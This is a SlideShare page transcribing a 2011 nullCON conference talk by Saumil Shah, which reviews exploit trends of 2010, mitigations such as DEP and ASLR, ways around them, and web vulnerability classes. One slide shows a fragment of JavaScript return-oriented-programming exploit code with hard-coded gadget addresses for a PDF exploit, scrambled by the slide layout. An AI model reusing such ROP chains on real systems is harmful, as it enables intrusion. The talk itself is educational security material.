0
2010: A Net Odyssey                  Saumil Shah                   nullCON Goanet-square                    26.02.2011    ...
Welcome to NullCON!net-square        nullcon.net | null.co.in   n|u dwitiya
# who am i             Saumil Shah - CEO Net-Square                   saumilshah                 !"#               !"# Hac...
What!                 did we!             learn from!                      ?!net-square            n|u dwitiya
net-square   n|u dwitiya
Attack Surfacenet-square                    n|u dwitiya
ATTACK SURFACE 2010-2011                                      5net-square                        n|u dwitiya
Wider Attack Surface                                        5net-square                          n|u dwitiya
Ease of Exploitation                                        5net-square                          n|u dwitiya
Mass Manufacturing                                           5                                  d wide                    ...
Complexity...                                     5    ...as          neve       seen r    befo          re!net-square    ...
A New Dimension!                                             5                               NTEED!!                      ...
"The amount of intelligence in the world is constant.                                             And the population is in...
Exploit Mitigation                Techniquesnet-square                        n|u dwitiya
/GS     SafeSEH         DEP        ASLRPermanent DEPASLR and DEP net-square     n|u dwitiya
/GS    SEH overwrites     SafeSEH    non-SEH DLLs         DEP    Return to LibC        ASLR     Heap SpraysPermanent DEP  ...
Its SPLOIT TIME! net-square         n|u dwitiya
Jedi A/V Tricks       These are        not the     sploitz youre      looking for.net-square                     n|u dwitiya
Obfuscated Javascript                  decoded without using                  eval, document.write,                       ...
High Tech vs. Low Tech      Acrobat CoolType exploit      Escape-From-PDF Return Oriented Programming code    No fancy tri...
This iz what ?net-square                    n|u dwitiya
Im an evil Javascript       Im an innocent imagenet-square                                      n|u dwitiya
function packv(n)                                              {var s=new Number                          (16);while(s.len...
Server Side  Vulnerabilitiesnet-square          n|u dwitiya
SQL injection             XSS         CSRF       RFI/LFIInput tamperingnet-square         n|u dwitiya
Who broke the Web?             HTML                      HTTP     Standards...                                  Old and id...
W3C"I dont think its ready for production yet," especially since W3C still willmake some changes on APIs, said Le Hegaret....
Application               Delivery             Authentication             Statefulness             Data Typing            ...
The Web             Application at present            DeliveryHTTP   AJAX          AuthenticationHTML   Flash         Stat...
The FUTURE is HERE!net-square                   n|u dwitiya
No longer Science Fiction                DEP           Man in the              bypassing        Browser              ROP c...
The Solution?net-square                   n|u dwitiya
Keep on             patching!net-square         n|u dwitiya
I can haz        sandbox                   I Also Can!net-square                       n|u dwitiya
The Solution?         HTML 8.0      Browser Security         HTTP 2.0          Model  Self Contained       Appsnet-square ...
n|u   dwitiyakthxbai                                    saumil@net-square.com                                  slideshare....
Upcoming SlideShare
Loading in...5
×

nullcon 2011 - Lessons learned from 2010

828

Published on

Lessons learned from 2010 by Saumil Shah

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
828
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
17
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "nullcon 2011 - Lessons learned from 2010"

  1. 1. 2010: A Net Odyssey Saumil Shah nullCON Goanet-square 26.02.2011 n|u dwitiya
  2. 2. Welcome to NullCON!net-square nullcon.net | null.co.in n|u dwitiya
  3. 3. # who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% (" )*+ ,"net-square n|u dwitiya
  4. 4. What! did we! learn from! ?!net-square n|u dwitiya
  5. 5. net-square n|u dwitiya
  6. 6. Attack Surfacenet-square n|u dwitiya
  7. 7. ATTACK SURFACE 2010-2011 5net-square n|u dwitiya
  8. 8. Wider Attack Surface 5net-square n|u dwitiya
  9. 9. Ease of Exploitation 5net-square n|u dwitiya
  10. 10. Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. tracknet-square n|u dwitiya
  11. 11. Complexity... 5 ...as neve seen r befo re!net-square n|u dwitiya
  12. 12. A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com putersnet-square n|u dwitiya
  13. 13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Pluginsnet-square n|u dwitiya
  14. 14. Exploit Mitigation Techniquesnet-square n|u dwitiya
  15. 15. /GS SafeSEH DEP ASLRPermanent DEPASLR and DEP net-square n|u dwitiya
  16. 16. /GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap SpraysPermanent DEP ROPASLR and DEP JIT Sprays net-square n|u dwitiya
  17. 17. Its SPLOIT TIME! net-square n|u dwitiya
  18. 18. Jedi A/V Tricks These are not the sploitz youre looking for.net-square n|u dwitiya
  19. 19. Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploitnet-square n|u dwitiya
  20. 20. High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricksnet-square n|u dwitiya
  21. 21. This iz what ?net-square n|u dwitiya
  22. 22. Im an evil Javascript Im an innocent imagenet-square n|u dwitiya
  23. 23. function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u"+s.su (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS>net-square n|u dwitiya
  24. 24. Server Side Vulnerabilitiesnet-square n|u dwitiya
  25. 25. SQL injection XSS CSRF RFI/LFIInput tamperingnet-square n|u dwitiya
  26. 26. Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerfulnet-square n|u dwitiya
  27. 27. W3C"I dont think its ready for production yet," especially since W3C still willmake some changes on APIs, said Le Hegaret. "The real problem is can wemake HTML5 work across browsers and at the moment, that is not thecase." [6th October 2010] net-square n|u dwitiya
  28. 28. Application Delivery Authentication Statefulness Data Typing Non-mutablenet-square n|u dwitiya
  29. 29. The Web Application at present DeliveryHTTP AJAX AuthenticationHTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
  30. 30. The FUTURE is HERE!net-square n|u dwitiya
  31. 31. No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfarenet-square n|u dwitiya
  32. 32. The Solution?net-square n|u dwitiya
  33. 33. Keep on patching!net-square n|u dwitiya
  34. 34. I can haz sandbox I Also Can!net-square n|u dwitiya
  35. 35. The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Appsnet-square n|u dwitiya
  36. 36. n|u dwitiyakthxbai saumil@net-square.com slideshare.net/saumilshahnet-square www.net-square.com n|u dwitiya
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×